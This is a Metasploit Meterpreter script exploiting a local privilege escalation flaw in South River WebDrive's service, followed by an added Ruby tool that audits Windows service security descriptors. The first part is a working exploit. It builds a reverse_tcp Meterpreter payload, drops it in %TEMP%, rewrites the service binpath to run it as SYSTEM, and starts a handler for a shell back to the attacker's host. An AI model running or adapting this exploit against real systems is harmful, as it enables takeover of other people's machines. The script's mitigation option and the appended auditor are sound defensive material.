##
# South River Technologies WebDrive Service Bad Security Descriptor Local Privilege Escalation.
#
# This module exploits a privilege escalation vulnerability in South River Technologies WebDrive.
# Due to an empty security descriptor, a local attacker can gain elevated privileges.
# Tested on South River Technologies WebDrive 9.02 build 2232 on Microsoft Windows XP SP3.
# Vulnerability mitigation featured.
#
# Credit:
#  - Discovery - Nine:Situations:Group::bellick
#  - Meterpreter script - Trancer
#
# References:
#  - http://retrogod.altervista.org/9sg_south_river_priv.html
#  - http://www.rec-sec.com/2010/01/26/srt-webdrive-privilege-escalation/
#  - http://cve.mitre.org/cgi-bin/cvename.cgi?name=2009-4606
#  - http://osvdb.org/show/osvdb/59080
#
# mtrancer[@]gmail.com
# http://www.rec-sec.com
##

#
# Options
#
opts = Rex::Parser::Arguments.new(
  "-h" => [ false, "This help menu"],
  "-m" => [ false, "Mitigate"],
  "-r" => [ true,  "The IP of the system running Metasploit listening for the connect back"],
  "-p" => [ true,  "The port on the remote host where Metasploit is listening"]
)

#
# Default parameters
#
rhost = Rex::Socket.source_address("1.2.3.4")
rport = 4444
sname = 'WebDriveService'
pname = 'wdService.exe'

#
# Option parsing
#
opts.parse(args) do |opt, idx, val|
  case opt
  when "-h"
    print_status("South River Technologies WebDrive Service Bad Security Descriptor Local Privilege Escalation.")
    print_line(opts.usage)
    raise Rex::Script::Completed
  when "-m"
    client.sys.process.get_processes().each do |m|
      if ( m['name'] == pname )
        print_status("Found vulnerable process #{m['name']} with pid #{m['pid']}.")
        # Set correct service security descriptor to mitigate the vulnerability
        print_status("Setting correct security descriptor for the South River Technologies WebDrive Service.")
        client.sys.process.execute("cmd.exe /c sc sdset \"#{sname}\" D:(A;;CCLCSWLOCRRC;;;AU)(A;;CCLCSWRPLOCRRC;;;PU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWRPWPDTLOCRRC;;;SY)", nil, {'Hidden' => 'true'})
      end
    end
    raise Rex::Script::Completed
  when "-r"
    rhost = val
  when "-p"
    rport = val.to_i
  end
end

client.sys.process.get_processes().each do |m|
  if ( m['name'] == pname )
    print_status("Found vulnerable process #{m['name']} with pid #{m['pid']}.")

    # Build out the exe payload.
    pay = client.framework.payloads.create("windows/meterpreter/reverse_tcp")
    pay.datastore['LHOST'] = rhost
    pay.datastore['LPORT'] = rport
    raw = pay.generate
    exe = Msf::Util::EXE.to_win32pe(client.framework, raw)

    # Place our newly created exe in %TEMP%
    tempdir = client.fs.file.expand_path("%TEMP%")
    tempexe = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
    print_status("Sending EXE payload '#{tempexe}'.")
    fd = client.fs.file.new(tempexe, "wb")
    fd.write(exe)
    fd.close

    # Stop the vulnerable service
    print_status("Stopping service \"#{sname}\"...")
    client.sys.process.execute("cmd.exe /c sc stop \"#{sname}\" ", nil, {'Hidden' => 'true'})

    # Set exe payload as service binpath
    print_status("Setting \"#{sname}\" to #{tempexe}...")
    client.sys.process.execute("cmd.exe /c sc config \"#{sname}\" binpath= #{tempexe}", nil, {'Hidden' => 'true'})
    sleep(1)

    # Restart the service
    print_status("Restarting the \"#{sname}\" service...")
    client.sys.process.execute("cmd.exe /c sc start \"#{sname}\" ", nil, {'Hidden' => 'true'})

    # Our handler to receive the callback.
    handler = client.framework.exploits.create("multi/handler")
    handler.datastore['PAYLOAD'] = "windows/meterpreter/reverse_tcp"
    handler.datastore['LHOST'] = rhost
    handler.datastore['LPORT'] = rport
    handler.datastore['ExitOnSession'] = false
    handler.exploit_simple(
      'Payload' => handler.datastore['PAYLOAD'],
      'RunAsJob' => true
    )

    # Set service binpath back to normal
    client.sys.process.execute("cmd.exe /c sc config \"#{sname}\" binpath= %ProgramFiles%\\WebDrive\\#{pname}", nil, {'Hidden' => 'true'})
  end
end
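The script's `-m` option repairs the service by writing a known-good DACL with `sc sdset`. The following Ruby is an added example, not part of the Meterpreter script above or of the WebDrive product: it audits a service security descriptor in SDDL form (the string `sc sdshow <service>` prints) and reports access-allowed ACEs that give broad principals such as Everyone or Authenticated Users the rights that let them reconfigure, delete or take over a service. The hardened SDDL from the script is reused as the baseline; the weak descriptor and the hex-mask variant are constructed for the example.

```ruby
# Added example (not part of the original Meterpreter script): audit a
# Windows service security descriptor in SDDL form, the string that
# `sc sdshow <service>` prints and `sc sdset` consumes. It reports ACEs that
# hand broad principals rights to reconfigure, delete or take over the
# service, the misconfiguration class the script above repairs.

# Two-letter SDDL rights codes as they map for service objects.
DANGEROUS_RIGHTS = {
  'DC' => 'SERVICE_CHANGE_CONFIG', # can rewrite binPath=, i.e. choose what runs as the service
  'SD' => 'DELETE',
  'WD' => 'WRITE_DAC',             # can rewrite the DACL itself
  'WO' => 'WRITE_OWNER',
  'GA' => 'GENERIC_ALL',
  'GW' => 'GENERIC_WRITE'
}.freeze

# The same rights as access-mask bits, for ACEs written with a hex mask.
DANGEROUS_MASK = {
  0x00000002 => 'SERVICE_CHANGE_CONFIG',
  0x00010000 => 'DELETE',
  0x00040000 => 'WRITE_DAC',
  0x00080000 => 'WRITE_OWNER',
  0x10000000 => 'GENERIC_ALL',
  0x40000000 => 'GENERIC_WRITE'
}.freeze

# Well-known SID abbreviations that amount to "any local user".
BROAD_PRINCIPALS = {
  'WD' => 'Everyone', 'AU' => 'Authenticated Users', 'BU' => 'Builtin Users',
  'IU' => 'Interactive', 'AN' => 'Anonymous',
  'S-1-1-0' => 'Everyone', 'S-1-5-11' => 'Authenticated Users'
}.freeze

# Return the DACL's ACEs as hashes, or nil when the SD carries no DACL at all.
def parse_dacl(sddl)
  m = sddl.match(/D:(?:P|AI|AR)*((?:\([^)]*\))*)/)
  return nil unless m
  m[1].scan(/\(([^)]*)\)/).map do |(body)|
    type, flags, rights, _obj, _inh, sid = body.split(';', 6)
    # Rights are either one hex mask or a run of two-letter codes.
    codes = rights.start_with?('0x') ? [rights] : rights.scan(/../)
    { type: type, flags: flags, rights: codes, sid: sid }
  end
end

# Names of the dangerous rights present in an ACE's rights field.
def dangerous_rights(codes)
  if codes.size == 1 && codes[0].start_with?('0x')
    mask = codes[0].to_i(16)
    DANGEROUS_MASK.select { |bit, _| (mask & bit) != 0 }.values
  else
    codes.map { |c| DANGEROUS_RIGHTS[c] }.compact
  end
end

# One finding per access-allowed ACE that gives a broad principal a dangerous right.
def audit_service_sddl(sddl)
  aces = parse_dacl(sddl)
  # A missing DACL is a NULL DACL: the object is writable by everyone.
  return ['no DACL present (NULL DACL): every principal has full control'] if aces.nil?
  aces.each_with_object([]) do |ace, findings|
    next unless ace[:type] == 'A'          # only access-allowed ACEs grant anything
    who = BROAD_PRINCIPALS[ace[:sid]]
    next unless who
    granted = dangerous_rights(ace[:rights])
    next if granted.empty?
    findings << "#{who} (#{ace[:sid]}) granted #{granted.join(', ')}"
  end
end

# Constructed inputs: the hardened descriptor the script applies with
# `sc sdset`, and a deliberately weak one granting Everyone full control.
HARDENED_SDDL = 'D:(A;;CCLCSWLOCRRC;;;AU)(A;;CCLCSWRPLOCRRC;;;PU)' \
                '(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWRPWPDTLOCRRC;;;SY)'
WEAK_SDDL = 'D:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)(A;;CCLCSWRPWPDTLOCRRC;;;SY)'

if __FILE__ == $PROGRAM_NAME
  { 'hardened' => HARDENED_SDDL, 'weak' => WEAK_SDDL }.each do |label, sddl|
    findings = audit_service_sddl(sddl)
    puts "#{label}: #{findings.empty? ? 'OK' : findings.join('; ')}"
  end
end
```

Feed it the output of `sc sdshow` for each service on a host and anything it reports is a service whose configuration an ordinary user can rewrite; the fix is the same `sc sdset` with a descriptor like the hardened one above. The parser handles the `P`/`AI`/`AR` DACL control flags and hex access masks, but not conditional (`XA`) ACEs, which are rare on service objects.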